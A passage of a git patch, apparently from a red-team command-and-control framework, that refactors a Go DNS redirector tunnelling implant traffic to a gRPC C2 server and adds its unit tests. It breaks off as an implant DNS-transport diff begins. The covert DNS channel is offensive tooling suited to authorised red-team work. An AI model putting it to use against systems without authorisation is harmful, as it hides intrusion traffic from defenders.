+ ResponseChunks []string // Base32 encoded (TXT) or raw binary (A/AAAA) (exported for testing) + ResponseCRC uint16 // Exported for testing + IsBinaryChunking bool // true for A/AAAA, false for TXT (exported for testing) } func (r *Redirector) Redirect(ctx context.Context, listenOn string, upstream 
*grpc.ClientConn) error { - listenAddr, domains, err := parseListenAddr(listenOn) + listenAddr, domains, err := ParseListenAddr(listenOn) if err != nil { return fmt.Errorf("failed to parse listen address: %w", err) } @@ -135,9 +165,9 @@ func (r *Redirector) Redirect(ctx context.Context, listenOn string, upstream *gr } } -// parseListenAddr extracts address and domain parameters from listenOn string +// ParseListenAddr extracts address and domain parameters from listenOn string // Format: "addr:port?domain=example.com&domain=other.com" -func parseListenAddr(listenOn string) (string, []string, error) { +func ParseListenAddr(listenOn string) (string, []string, error) { parts := strings.SplitN(listenOn, "?", 2) addr := parts[0] @@ -186,9 +216,9 @@ func (r *Redirector) cleanupConversations(ctx context.Context) { r.conversations.Range(func(key, value interface{}) bool { conv := value.(*Conversation) conv.mu.Lock() - if now.Sub(conv.lastActivity) > convTimeout { + if now.Sub(conv.LastActivity) > convTimeout { r.conversations.Delete(key) - slog.Debug("conversation expired", "conv_id", conv.id) + slog.Debug("conversation expired", "conv_id", conv.ID) } conv.mu.Unlock() return true @@ -287,13 +317,13 @@ func (r *Redirector) handleDNSQuery(ctx context.Context, conn *net.UDPConn, addr var responseData []byte switch pktType { case typeInit: - responseData, err = r.handleInitPacket(convID, string(data)) + responseData, err = r.HandleInitPacket(convID, string(data)) case typeData: - responseData, err = r.handleDataPacket(convID, seq, data) + responseData, err = r.HandleDataPacket(convID, seq, data) case typeEnd: - responseData, err = r.handleEndPacket(ctx, upstream, convID, seq, queryType) + responseData, err = r.HandleEndPacket(ctx, upstream, convID, seq, queryType) case typeFetch: - responseData, err = r.handleFetchPacket(convID, seq) + responseData, err = r.HandleFetchPacket(convID, seq) default: err = fmt.Errorf("unknown packet type: %c", pktType) } @@ -309,9 +339,9 @@ func 
(r *Redirector) handleDNSQuery(ctx context.Context, conn *net.UDPConn, addr switch queryType { case txtRecordType: maxCapacity = maxDNSResponseSize - case 1: + case aRecordType: maxCapacity = 4 - case 28: + case aaaaRecordType: maxCapacity = 16 default: maxCapacity = maxDNSResponseSize @@ -327,11 +357,11 @@ func (r *Redirector) handleDNSQuery(ctx context.Context, conn *net.UDPConn, addr if pktType == typeInit { actualConvID = convID conv = &Conversation{ - id: actualConvID, - lastActivity: time.Now(), - responseData: responseData, - responseCRC: calculateCRC16(responseData), - isBinaryChunking: true, + ID: actualConvID, + LastActivity: time.Now(), + ResponseData: responseData, + ResponseCRC: CalculateCRC16(responseData), + IsBinaryChunking: true, } r.conversations.Store(actualConvID, conv) } else { @@ -347,44 +377,44 @@ func (r *Redirector) handleDNSQuery(ctx context.Context, conn *net.UDPConn, addr conv.mu.Lock() - conv.responseData = responseData - conv.responseCRC = calculateCRC16(responseData) - conv.isBinaryChunking = true + conv.ResponseData = responseData + conv.ResponseCRC = CalculateCRC16(responseData) + conv.IsBinaryChunking = true - conv.responseChunks = nil + conv.ResponseChunks = nil for i := 0; i < len(responseData); i += maxCapacity { end := i + maxCapacity if end > len(responseData) { end = len(responseData) } - conv.responseChunks = append(conv.responseChunks, string(responseData[i:end])) + conv.ResponseChunks = append(conv.ResponseChunks, string(responseData[i:end])) } conv.mu.Unlock() var response []byte if maxCapacity <= 4 { - if len(conv.responseChunks) > 65535 { - slog.Error("too many chunks for binary format", "chunks", len(conv.responseChunks)) + if len(conv.ResponseChunks) > 65535 { + slog.Error("too many chunks for binary format", "chunks", len(conv.ResponseChunks)) r.sendErrorResponse(conn, addr, transactionID) return } response = make([]byte, 4) response[0] = 0xFF - response[1] = byte(len(conv.responseChunks) >> 8) - response[2] = 
byte(len(conv.responseChunks) & 0xFF) - response[3] = byte(conv.responseCRC & 0xFF) + response[1] = byte(len(conv.ResponseChunks) >> 8) + response[2] = byte(len(conv.ResponseChunks) & 0xFF) + response[3] = byte(conv.ResponseCRC & 0xFF) slog.Debug("using compact binary chunked indicator", - "chunks", len(conv.responseChunks), "crc_low", response[3]) + "chunks", len(conv.ResponseChunks), "crc_low", response[3]) } else { - responseStr := fmt.Sprintf("%s%s:%s", respChunked, encodeSeq(len(conv.responseChunks)), encodeBase36CRC(int(conv.responseCRC))) + responseStr := fmt.Sprintf("%s%s:%s", respChunked, encodeSeq(len(conv.ResponseChunks)), EncodeBase36CRC(int(conv.ResponseCRC))) response = []byte(responseStr) } slog.Debug("response too large for record type, using multi-query chunking", "conv_id", actualConvID, "packet_type", string(pktType), "data_size", len(responseData), - "max_capacity", maxCapacity, "query_type", queryType, "chunks", len(conv.responseChunks), + "max_capacity", maxCapacity, "query_type", queryType, "chunks", len(conv.ResponseChunks), "indicator_size", len(response)) r.sendDNSResponse(conn, addr, transactionID, domain, response, queryType) @@ -399,9 +429,9 @@ func (r *Redirector) handleDNSQuery(ctx context.Context, conn *net.UDPConn, addr } } -// handleInitPacket processes init packet and creates conversation +// HandleInitPacket processes init packet and creates conversation // Init payload format: [method_code:2][total_chunks:5][crc:4] -func (r *Redirector) handleInitPacket(tempConvID string, data string) ([]byte, error) { +func (r *Redirector) HandleInitPacket(tempConvID string, data string) ([]byte, error) { slog.Debug("handling init packet", "temp_conv_id", tempConvID, "data", data, "data_len", len(data)) // Payload: method(2) + chunks(5) + crc(4) = 11 chars @@ -431,12 +461,12 @@ func (r *Redirector) handleInitPacket(tempConvID string, data string) ([]byte, e realConvID := generateConvID() conv := &Conversation{ - id: realConvID, - methodPath: 
methodPath, - totalChunks: totalChunks, - expectedCRC: uint16(expectedCRC), - chunks: make(map[int][]byte), - lastActivity: time.Now(), + ID: realConvID, + MethodPath: methodPath, + TotalChunks: totalChunks, + ExpectedCRC: uint16(expectedCRC), + Chunks: make(map[int][]byte), + LastActivity: time.Now(), } r.conversations.Store(realConvID, conv) @@ -446,8 +476,8 @@ func (r *Redirector) handleInitPacket(tempConvID string, data string) ([]byte, e return []byte(realConvID), nil } -// handleDataPacket stores a data chunk in the conversation -func (r *Redirector) handleDataPacket(convID string, seq int, data []byte) ([]byte, error) { +// HandleDataPacket stores a data chunk in the conversation +func (r *Redirector) HandleDataPacket(convID string, seq int, data []byte) ([]byte, error) { convVal, ok := r.conversations.Load(convID) if !ok { return nil, fmt.Errorf("unknown conversation: %s", convID) @@ -457,15 +487,15 @@ func (r *Redirector) handleDataPacket(convID string, seq int, data []byte) ([]by conv.mu.Lock() defer conv.mu.Unlock() - conv.lastActivity = time.Now() + conv.LastActivity = time.Now() // Ignore chunks beyond declared total (duplicates/retransmissions) - if seq >= conv.totalChunks { - slog.Warn("ignoring chunk beyond expected total", "conv_id", convID, "seq", seq, "expected_total", conv.totalChunks) + if seq >= conv.TotalChunks { + slog.Warn("ignoring chunk beyond expected total", "conv_id", convID, "seq", seq, "expected_total", conv.TotalChunks) return []byte{}, nil } - conv.chunks[seq] = data + conv.Chunks[seq] = data dataPreview := "" if len(data) > 0 { @@ -473,13 +503,13 @@ func (r *Redirector) handleDataPacket(convID string, seq int, data []byte) ([]by dataPreview = fmt.Sprintf("%x", data[:previewLen]) } - slog.Debug("received chunk", "conv_id", convID, "seq", seq, "chunk_len", len(data), "total_received", len(conv.chunks), "expected_total", conv.totalChunks, "data_preview", dataPreview) + slog.Debug("received chunk", "conv_id", convID, "seq", seq, 
"chunk_len", len(data), "total_received", len(conv.Chunks), "expected_total", conv.TotalChunks, "data_preview", dataPreview) return []byte{}, nil } -// handleEndPacket processes end packet and returns server response -func (r *Redirector) handleEndPacket(ctx context.Context, upstream *grpc.ClientConn, convID string, lastSeq int, queryType uint16) ([]byte, error) { +// HandleEndPacket processes end packet and returns server response +func (r *Redirector) HandleEndPacket(ctx context.Context, upstream *grpc.ClientConn, convID string, lastSeq int, queryType uint16) ([]byte, error) { convVal, ok := r.conversations.Load(convID) if !ok { return nil, fmt.Errorf("unknown conversation: %s", convID) @@ -489,14 +519,14 @@ func (r *Redirector) handleEndPacket(ctx context.Context, upstream *grpc.ClientC conv.mu.Lock() defer conv.mu.Unlock() - conv.lastActivity = time.Now() + conv.LastActivity = time.Now() - slog.Debug("end packet received", "conv_id", convID, "last_seq", lastSeq, "chunks_received", len(conv.chunks)) + slog.Debug("end packet received", "conv_id", convID, "last_seq", lastSeq, "chunks_received", len(conv.Chunks)) // Check for missing chunks var missing []int - for i := 0; i < conv.totalChunks; i++ { - if _, ok := conv.chunks[i]; !ok { + for i := 0; i < conv.TotalChunks; i++ { + if _, ok := conv.Chunks[i]; !ok { missing = append(missing, i) } } @@ -515,31 +545,31 @@ func (r *Redirector) handleEndPacket(ctx context.Context, upstream *grpc.ClientC } // Reassemble data (chunks now contain raw binary, not base32) - requestData := r.reassembleChunks(conv.chunks, conv.totalChunks) + requestData := r.reassembleChunks(conv.Chunks, conv.TotalChunks) // Sanity check: ensure we have exactly the right number of chunks - if len(conv.chunks) != conv.totalChunks { - slog.Error("chunk count mismatch", "conv_id", convID, "chunks_in_map", len(conv.chunks), "total_chunks_declared", conv.totalChunks) - return []byte(respError + fmt.Sprintf("chunk_count_mismatch: have %d, expected %d", 
len(conv.chunks), conv.totalChunks)), nil + if len(conv.Chunks) != conv.TotalChunks { + slog.Error("chunk count mismatch", "conv_id", convID, "chunks_in_map", len(conv.Chunks), "total_chunks_declared", conv.TotalChunks) + return []byte(respError + fmt.Sprintf("chunk_count_mismatch: have %d, expected %d", len(conv.Chunks), conv.TotalChunks)), nil } slog.Debug("reassembled data", "conv_id", convID, "bytes_len", len(requestData)) // Verify CRC (chunks already contain raw decrypted data) - actualCRC := calculateCRC16(requestData) - expectedCRC := uint16(conv.expectedCRC) + actualCRC := CalculateCRC16(requestData) + expectedCRC := uint16(conv.ExpectedCRC) - slog.Debug("CRC check", "conv_id", convID, "expected", expectedCRC, "actual", actualCRC, "data_len", len(requestData), "chunks_received", len(conv.chunks), "chunks_expected", conv.totalChunks) + slog.Debug("CRC check", "conv_id", convID, "expected", expectedCRC, "actual", actualCRC, "data_len", len(requestData), "chunks_received", len(conv.Chunks), "chunks_expected", conv.TotalChunks) if actualCRC != expectedCRC { errMsg := fmt.Sprintf("CRC mismatch: expected %d, got %d", expectedCRC, actualCRC) - slog.Error(errMsg, "conv_id", convID, "data_len", len(requestData), "chunks_map_size", len(conv.chunks), "total_chunks_declared", conv.totalChunks) + slog.Error(errMsg, "conv_id", convID, "data_len", len(requestData), "chunks_map_size", len(conv.Chunks), "total_chunks_declared", conv.TotalChunks) return []byte(respError + "invalid_crc"), nil } slog.Debug("reassembled and validated data", "conv_id", convID, "bytes", len(requestData)) // Forward to upstream gRPC server - responseData, err := r.forwardToUpstream(ctx, upstream, conv.methodPath, requestData) + responseData, err := r.forwardToUpstream(ctx, upstream, conv.MethodPath, requestData) if err != nil { return nil, fmt.Errorf("failed to forward to upstream: %w", err) } @@ -547,7 +577,7 @@ func (r *Redirector) handleEndPacket(ctx context.Context, upstream *grpc.ClientC // 
Determine if we need to base32-encode the response // For A/AAAA records that will use binary chunking, return raw binary // For TXT records, return base32-encoded with "ok:" prefix - useBinaryChunking := (queryType == 1 || queryType == 28) // A or AAAA record + useBinaryChunking := (queryType == aRecordType || queryType == aaaaRecordType) if useBinaryChunking { // Return raw binary data for A/AAAA records @@ -564,32 +594,30 @@ func (r *Redirector) handleEndPacket(ctx context.Context, upstream *grpc.ClientC slog.Debug("response too large, chunking", "conv_id", convID, "size", len(responseData), "encoded_size", len(encodedResponse)) // Store response data in conversation - conv.responseData = responseData - conv.responseCRC = calculateCRC16(responseData) // Use full 16-bit CRC + conv.ResponseData = responseData + conv.ResponseCRC = CalculateCRC16(responseData) // Use full 16-bit CRC // Chunk the encoded response - conv.responseChunks = nil + conv.ResponseChunks = nil for i := 0; i < len(encodedResponse); i += maxResponseChunkSize { end := i + maxResponseChunkSize if end > len(encodedResponse) { end = len(encodedResponse) } - conv.responseChunks = append(conv.responseChunks, encodedResponse[i:end]) + conv.ResponseChunks = append(conv.ResponseChunks, encodedResponse[i:end]) } // Return chunked response indicator: "r:[num_chunks]:[crc]" - response := fmt.Sprintf("%s%s:%s", respChunked, encodeSeq(len(conv.responseChunks)), encodeBase36CRC(int(conv.responseCRC))) - slog.Debug("returning chunked response indicator", "conv_id", convID, "chunks", len(conv.responseChunks), "crc", conv.responseCRC) // Don't delete conversation yet - client will fetch chunks + response := fmt.Sprintf("%s%s:%s", respChunked, encodeSeq(len(conv.ResponseChunks)), EncodeBase36CRC(int(conv.ResponseCRC))) + slog.Debug("returning chunked response indicator", "conv_id", convID, "chunks", len(conv.ResponseChunks), "crc", conv.ResponseCRC) return []byte(response), nil } - // Return success with response 
- // Note: Conversation will be deleted by the main handler after successful send return []byte(responseWithPrefix), nil } -// handleFetchPacket serves a response chunk to the client -func (r *Redirector) handleFetchPacket(convID string, chunkSeq int) ([]byte, error) { +// HandleFetchPacket serves a response chunk to the client +func (r *Redirector) HandleFetchPacket(convID string, chunkSeq int) ([]byte, error) { convVal, ok := r.conversations.Load(convID) if !ok { return nil, fmt.Errorf("unknown conversation: %s", convID) @@ -599,10 +627,10 @@ func (r *Redirector) handleFetchPacket(convID string, chunkSeq int) ([]byte, err conv.mu.Lock() defer conv.mu.Unlock() - conv.lastActivity = time.Now() + conv.LastActivity = time.Now() // Check if this is the final fetch (cleanup request) - if chunkSeq >= len(conv.responseChunks) { + if chunkSeq >= len(conv.ResponseChunks) { // Client is done fetching - clean up conversation r.conversations.Delete(convID) slog.Debug("conversation completed and cleaned up", "conv_id", convID) @@ -610,16 +638,16 @@ func (r *Redirector) handleFetchPacket(convID string, chunkSeq int) ([]byte, err } // Return the requested chunk - if chunkSeq < 0 || chunkSeq >= len(conv.responseChunks) { - return nil, fmt.Errorf("invalid chunk sequence: %d (total: %d)", chunkSeq, len(conv.responseChunks)) + if chunkSeq < 0 || chunkSeq >= len(conv.ResponseChunks) { + return nil, fmt.Errorf("invalid chunk sequence: %d (total: %d)", chunkSeq, len(conv.ResponseChunks)) } - chunk := conv.responseChunks[chunkSeq] - slog.Debug("serving response chunk", "conv_id", convID, "seq", chunkSeq, "size", len(chunk), "is_binary", conv.isBinaryChunking) + chunk := conv.ResponseChunks[chunkSeq] + slog.Debug("serving response chunk", "conv_id", convID, "seq", chunkSeq, "size", len(chunk), "is_binary", conv.IsBinaryChunking) // For binary chunking (A/AAAA), return raw bytes // For text chunking (TXT), return "ok:" prefix + base32 data - if conv.isBinaryChunking { + if 
conv.IsBinaryChunking { return []byte(chunk), nil } return []byte(respOK + chunk), nil @@ -740,30 +768,6 @@ func (r *Redirector) forwardToUpstream(ctx context.Context, upstream *grpc.Clien return responseData, nil } -// parseDomainName extracts the domain name from a DNS query -func (r *Redirector) parseDomainName(data []byte) (string, error) { - var labels []string - offset := 0 - - for offset < len(data) { - length := int(data[offset]) - if length == 0 { - break - } - offset++ - - if offset+length > len(data) { - return "", fmt.Errorf("invalid label length") - } - - label := string(data[offset : offset+length]) - labels = append(labels, label) - offset += length - } - - return strings.Join(labels, "."), nil -} - // parseDomainNameAndType extracts both domain name and query type from DNS question func (r *Redirector) parseDomainNameAndType(data []byte) (string, uint16, error) { var labels []string @@ -861,12 +865,12 @@ func (r *Redirector) sendDNSResponse(conn *net.UDPConn, addr *net.UDPAddr, trans rdata = append(rdata, chunk...) 
} - case 1: // A record (4 bytes capacity) + case aRecordType: // Pad to 4 bytes (data already validated to fit) rdata = make([]byte, 4) copy(rdata, data) - case 28: // AAAA record (16 bytes capacity) + case aaaaRecordType: // Pad to 16 bytes (data already validated to fit) rdata = make([]byte, 16) copy(rdata, data) @@ -933,23 +937,19 @@ func codeToMethod(code string) string { return "/c2.C2/ClaimTasks" } -// encodeSeq encodes sequence number to 5-digit base36 (max: 60,466,175) -func encodeSeq(seq int) string { +// encodeBase36 encodes an integer to base36 string with specified number of digits +func encodeBase36(value int, digits int) string { const base36 = "0123456789abcdefghijklmnopqrstuvwxyz" - digit4 := (seq / 1679616) % 36 // 36^4 - digit3 := (seq / 46656) % 36 // 36^3 - digit2 := (seq / 1296) % 36 // 36^2 - digit1 := (seq / 36) % 36 // 36^1 - digit0 := seq % 36 // 36^0 - return string([]byte{base36[digit4], base36[digit3], base36[digit2], base36[digit1], base36[digit0]}) -} - -// decodeSeq decodes 5-character base36 sequence number -func decodeSeq(encoded string) (int, error) { - if len(encoded) != 5 { - return 0, fmt.Errorf("invalid sequence length: expected 5, got %d", len(encoded)) + result := make([]byte, digits) + for i := digits - 1; i >= 0; i-- { + result[i] = base36[value%36] + value /= 36 } + return string(result) +} +// decodeBase36 decodes a base36 string to an integer +func decodeBase36(encoded string) (int, error) { val := func(c byte) (int, error) { switch { case c >= '0' && c <= '9': @@ -961,27 +961,33 @@ func decodeSeq(encoded string) (int, error) { } } - d4, _ := val(encoded[0]) - d3, _ := val(encoded[1]) - d2, _ := val(encoded[2]) - d1, _ := val(encoded[3]) - d0, err := val(encoded[4]) - if err != nil { - return 0, err + result := 0 + for _, c := range []byte(encoded) { + digit, err := val(c) + if err != nil { + return 0, err + } + result = result*36 + digit } + return result, nil +} - return d4*1679616 + d3*46656 + d2*1296 + d1*36 + d0, 
nil +// encodeSeq encodes sequence number to 5-digit base36 (max: 60,466,175) +func encodeSeq(seq int) string { + return encodeBase36(seq, 5) } -// encodeBase36CRC encodes CRC16 to 4-digit base36 (range: 0-1,679,615 covers 0-65,535) -// Used only for init packet payload and chunked response metadata -func encodeBase36CRC(crc int) string { - const base36 = "0123456789abcdefghijklmnopqrstuvwxyz" - digit3 := (crc / 46656) % 36 // 36^3 - digit2 := (crc / 1296) % 36 // 36^2 - digit1 := (crc / 36) % 36 // 36^1 - digit0 := crc % 36 // 36^0 - return string([]byte{base36[digit3], base36[digit2], base36[digit1], base36[digit0]}) +// decodeSeq decodes 5-character base36 sequence number +func decodeSeq(encoded string) (int, error) { + if len(encoded) != 5 { + return 0, fmt.Errorf("invalid sequence length: expected 5, got %d", len(encoded)) + } + return decodeBase36(encoded) +} + +// EncodeBase36CRC encodes CRC16 to 4-digit base36 (range: 0-1,679,615 covers 0-65,535) +func EncodeBase36CRC(crc int) string { + return encodeBase36(crc, 4) } // decodeBase36CRC decodes 4-character base36 CRC value @@ -989,31 +995,11 @@ func decodeBase36CRC(encoded string) (int, error) { if len(encoded) != 4 { return 0, fmt.Errorf("invalid CRC length: expected 4, got %d", len(encoded)) } - - val := func(c byte) (int, error) { - switch { - case c >= '0' && c <= '9': - return int(c - '0'), nil - case c >= 'a' && c <= 'z': - return int(c-'a') + 10, nil - default: - return 0, fmt.Errorf("invalid base36 character: %c", c) - } - } - - d3, _ := val(encoded[0]) - d2, _ := val(encoded[1]) - d1, _ := val(encoded[2]) - d0, err := val(encoded[3]) - if err != nil { - return 0, err - } - - return d3*46656 + d2*1296 + d1*36 + d0, nil + return decodeBase36(encoded) } -// calculateCRC16 computes CRC16-CCITT checksum (polynomial 0x1021, init 0xFFFF) -func calculateCRC16(data []byte) uint16 { +// CalculateCRC16 computes CRC16-CCITT checksum (polynomial 0x1021, init 0xFFFF) +func CalculateCRC16(data []byte) uint16 { var 
crc uint16 = 0xFFFF for _, b := range data { crc ^= uint16(b) << 8 diff --git a/tavern/internal/redirectors/dns/dns_test.go b/tavern/internal/redirectors/dns/dns_test.go new file mode 100644 index 000000000..9ce1a8cf5 --- /dev/null +++ b/tavern/internal/redirectors/dns/dns_test.go @@ -0,0 +1,337 @@ +package dns_test + +import ( + "context" + "net" + "testing" + "time" + + "github.com/stretchr/testify/assert" + "github.com/stretchr/testify/require" + "google.golang.org/grpc" + "google.golang.org/grpc/credentials/insecure" + + dnsredirector "realm.pub/tavern/internal/redirectors/dns" +) + +// TestParseListenAddr tests the parseListenAddr function +func TestParseListenAddr(t *testing.T) { + t.Run("default port with multiple domains", func(t *testing.T) { + addr, domains, err := dnsredirector.ParseListenAddr("0.0.0.0?domain=example.com&domain=foo.bar") + require.NoError(t, err) + assert.Equal(t, "0.0.0.0:53", addr) + assert.ElementsMatch(t, []string{"example.com", "foo.bar"}, domains) + }) + + t.Run("custom port with single domain", func(t *testing.T) { + addr, domains, err := dnsredirector.ParseListenAddr("127.0.0.1:8053?domain=example.com") + require.NoError(t, err) + assert.Equal(t, "127.0.0.1:8053", addr) + assert.ElementsMatch(t, []string{"example.com"}, domains) + }) + + t.Run("malformed domain value", func(t *testing.T) { + _, _, err := dnsredirector.ParseListenAddr("127.0.0.1:8053?domain=%ZZ") + assert.Error(t, err) + assert.Contains(t, err.Error(), "decode domain") + }) + + t.Run("no query params", func(t *testing.T) { + addr, domains, err := dnsredirector.ParseListenAddr("0.0.0.0:5353") + require.NoError(t, err) + assert.Equal(t, "0.0.0.0:5353", addr) + assert.Empty(t, domains) + }) +} + +// newTestRedirector creates a test redirector with stubbed upstream +func newTestRedirector() *dnsredirector.Redirector { + return &dnsredirector.Redirector{} +} + +// TestInitDataEndLifecycle tests the complete packet handling flow +func TestInitDataEndLifecycle(t 
*testing.T) { + r := newTestRedirector() + + // Step 1: Send init packet + // Init payload: [method_code:2][total_chunks:5][crc:4] + methodCode := "ct" // ClaimTasks + totalChunksStr := "00002" // 2 chunks (base36) + testData := []byte{0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08} + crc := dnsredirector.CalculateCRC16(testData) + crcStr := dnsredirector.EncodeBase36CRC(int(crc)) + + initPayload := methodCode + totalChunksStr + crcStr + tempConvID := "temp12345678" + + convID, err := r.HandleInitPacket(tempConvID, initPayload) + require.NoError(t, err) + assert.NotEmpty(t, convID) + assert.Len(t, convID, 12) // CONV_ID_SIZE + + convIDStr := string(convID) + + // Verify conversation was created + conv, ok := r.GetConversation(convIDStr) + require.True(t, ok) + assert.Equal(t, "/c2.C2/ClaimTasks", conv.MethodPath) + assert.Equal(t, 2, conv.TotalChunks) + assert.Equal(t, crc, conv.ExpectedCRC) + + // Step 2: Send data chunks + chunk0 := testData[:4] + chunk1 := testData[4:] + + _, err = r.HandleDataPacket(convIDStr, 0, chunk0) + require.NoError(t, err) + + _, err = r.HandleDataPacket(convIDStr, 1, chunk1) + require.NoError(t, err) + + // Verify chunks were stored + conv, _ = r.GetConversation(convIDStr) + assert.Len(t, conv.Chunks, 2) + + // Step 3: Send end packet with stub upstream + ctx := context.Background() + stubUpstream := newStubUpstream(t, testData) + defer stubUpstream.Close() + + responseData, err := r.HandleEndPacket(ctx, stubUpstream.ClientConn(), convIDStr, 1, 16) // queryType=16 (TXT) + require.NoError(t, err) + assert.Contains(t, string(responseData), "ok:") +} + +// TestHandleDataPacketUnknownConversation tests error handling for unknown conversation +func TestHandleDataPacketUnknownConversation(t *testing.T) { + r := newTestRedirector() + + _, err := r.HandleDataPacket("nonexistent", 0, []byte{0x01, 0x02}) + assert.Error(t, err) + assert.Contains(t, err.Error(), "unknown conversation") +} + +// TestHandleFetchPacket tests response chunk fetching 
+func TestHandleFetchPacket(t *testing.T) { + r := newTestRedirector() + + t.Run("fetch chunk within bounds - text chunking", func(t *testing.T) { + convID := "test12345678" + conv := &dnsredirector.Conversation{ + ID: convID, + ResponseChunks: []string{"chunk0", "chunk1", "chunk2"}, + IsBinaryChunking: false, + LastActivity: time.Now(), + } + r.StoreConversation(convID, conv) + + // Fetch chunk 1 + data, err := r.HandleFetchPacket(convID, 1) + require.NoError(t, err) + assert.Equal(t, "ok:chunk1", string(data)) + + // Conversation should still exist + _, ok := r.GetConversation(convID) + assert.True(t, ok) + }) + + t.Run("fetch chunk within bounds - binary chunking", func(t *testing.T) { + convID := "bin123456789" + conv := &dnsredirector.Conversation{ + ID: convID, + ResponseChunks: []string{string([]byte{0x01, 0x02}), string([]byte{0x03, 0x04})}, + IsBinaryChunking: true, + LastActivity: time.Now(), + } + r.StoreConversation(convID, conv) + + // Fetch chunk 0 + data, err := r.HandleFetchPacket(convID, 0) + require.NoError(t, err) + assert.Equal(t, []byte{0x01, 0x02}, data) + }) + + t.Run("fetch beyond bounds triggers cleanup", func(t *testing.T) { + convID := "cleanup12345" + conv := &dnsredirector.Conversation{ + ID: convID, + ResponseChunks: []string{"chunk0"}, + IsBinaryChunking: false, + LastActivity: time.Now(), + } + r.StoreConversation(convID, conv) + + // Fetch seq beyond bounds + data, err := r.HandleFetchPacket(convID, 1) + require.NoError(t, err) + assert.Equal(t, "ok:", string(data)) + + // Conversation should be deleted + _, ok := r.GetConversation(convID) + assert.False(t, ok) + }) + + t.Run("fetch from unknown conversation", func(t *testing.T) { + _, err := r.HandleFetchPacket("unknown", 0) + assert.Error(t, err) + assert.Contains(t, err.Error(), "unknown conversation") + }) +} + +// TestCleanupConversations tests conversation expiration +func TestCleanupConversations(t *testing.T) { + r := newTestRedirector() + + // Create stale conversation (old 
timestamp) + staleConvID := "stale1234567" + staleConv := &dnsredirector.Conversation{ + ID: staleConvID, + LastActivity: time.Now().Add(-20 * time.Minute), // Older than timeout + } + r.StoreConversation(staleConvID, staleConv) + + // Create fresh conversation + freshConvID := "fresh1234567" + freshConv := &dnsredirector.Conversation{ + ID: freshConvID, + LastActivity: time.Now(), + } + r.StoreConversation(freshConvID, freshConv) + + // Run cleanup once + r.CleanupConversationsOnce(15 * time.Minute) + + // Verify stale conversation was removed + _, ok := r.GetConversation(staleConvID) + assert.False(t, ok, "stale conversation should be removed") + + // Verify fresh conversation remains + _, ok = r.GetConversation(freshConvID) + assert.True(t, ok, "fresh conversation should remain") +} + +// TestHandleEndPacketMissingChunks tests missing chunk detection +func TestHandleEndPacketMissingChunks(t *testing.T) { + r := newTestRedirector() + + // Create conversation with init + methodCode := "ct" + totalChunksStr := "00003" // 3 chunks + testData := []byte{0x01, 0x02, 0x03, 0x04, 0x05, 0x06} + crc := dnsredirector.CalculateCRC16(testData) + crcStr := dnsredirector.EncodeBase36CRC(int(crc)) + initPayload := methodCode + totalChunksStr + crcStr + + convID, err := r.HandleInitPacket("temp", initPayload) + require.NoError(t, err) + + convIDStr := string(convID) + + // Only send chunks 0 and 2 (skip chunk 1) + _, err = r.HandleDataPacket(convIDStr, 0, []byte{0x01, 0x02}) + require.NoError(t, err) + _, err = r.HandleDataPacket(convIDStr, 2, []byte{0x05, 0x06}) + require.NoError(t, err) + + // Send end packet + ctx := context.Background() + stubUpstream := newStubUpstream(t, testData) + defer stubUpstream.Close() + + responseData, err := r.HandleEndPacket(ctx, stubUpstream.ClientConn(), convIDStr, 2, 16) + require.NoError(t, err) + + // Should return missing chunks list + assert.Contains(t, string(responseData), "m:") + assert.Contains(t, string(responseData), "00001") // 
Missing chunk 1 in base36 +} + +// stubUpstream provides a minimal gRPC server for testing +type stubUpstream struct { + server *grpc.Server + clientConn *grpc.ClientConn + t *testing.T +} + +func newStubUpstream(t *testing.T, echoData []byte) *stubUpstream { + t.Helper() + + // Create a simple handler that echoes back the request + handler := func(srv any, stream grpc.ServerStream) error { + var reqBytes []byte + if err := stream.RecvMsg(&reqBytes); err != nil { + return err + } + + // Echo back the request data + return stream.SendMsg(echoData) + } + + server := grpc.NewServer(grpc.UnknownServiceHandler(handler)) + + // Start server on random port + listener, err := testListener(t) + require.NoError(t, err) + + go func() { + if err := server.Serve(listener); err != nil && err != grpc.ErrServerStopped { + t.Logf("stub server error: %v", err) + } + }() + + // Create client connection + conn, err := grpc.Dial(listener.Addr().String(), grpc.WithTransportCredentials(insecure.NewCredentials())) + require.NoError(t, err) + + return &stubUpstream{ + server: server, + clientConn: conn, + t: t, + } +} + +func (s *stubUpstream) ClientConn() *grpc.ClientConn { + return s.clientConn +} + +func (s *stubUpstream) Close() { + s.clientConn.Close() + s.server.Stop() +} + +func testListener(t *testing.T) (net.Listener, error) { + t.Helper() + return net.Listen("tcp", "127.0.0.1:0") +} + +// TestCRCMismatch tests CRC validation failure +func TestCRCMismatch(t *testing.T) { + r := newTestRedirector() + + // Create conversation with wrong CRC + methodCode := "ct" + totalChunksStr := "00001" + wrongCRC := dnsredirector.EncodeBase36CRC(12345) // Wrong CRC + initPayload := methodCode + totalChunksStr + wrongCRC + + convID, err := r.HandleInitPacket("temp", initPayload) + require.NoError(t, err) + + convIDStr := string(convID) + + // Send data with different content + actualData := []byte{0xFF, 0xFF, 0xFF, 0xFF} + _, err = r.HandleDataPacket(convIDStr, 0, actualData) + require.NoError(t, 
err) + + // Send end packet + ctx := context.Background() + stubUpstream := newStubUpstream(t, actualData) + defer stubUpstream.Close() + + responseData, err := r.HandleEndPacket(ctx, stubUpstream.ClientConn(), convIDStr, 0, 16) + require.NoError(t, err) + + // Should return CRC error + assert.Contains(t, string(responseData), "e:invalid_crc") +} From 518b3843a7dc357f38a7f1b1ea04a9f9ed53d9a1 Mon Sep 17 00:00:00 2001 From: KaliPatriot <43020092+KaliPatriot@users.noreply.github.com> Date: Fri, 5 Dec 2025 22:44:40 -0600 Subject: [PATCH 03/17] Fixed DNS resolver to use local system resolver --- implants/lib/transport/Cargo.toml | 2 +- implants/lib/transport/src/dns.rs | 379 +++++++++++++++++-------- tavern/internal/redirectors/dns/dns.go | 39 +++ 3 files changed, 293 insertions(+), 127 deletions(-) diff --git a/implants/lib/transport/Cargo.toml b/implants/lib/transport/Cargo.toml index 266e6305c..a13831abb 100644 --- a/implants/lib/transport/Cargo.toml +++ b/implants/lib/transport/Cargo.toml @@ -8,7 +8,7 @@ default = [] grpc = [] grpc-doh = ["grpc", "dep:hickory-resolver"] http1 = [] -dns = ["dep:data-encoding", "dep:rand"] +dns = ["dep:data-encoding", "dep:rand", "dep:hickory-resolver"] mock = ["dep:mockall"] [dependencies] diff --git a/implants/lib/transport/src/dns.rs b/implants/lib/transport/src/dns.rs index cf40bcda9..b4f496105 100644 --- 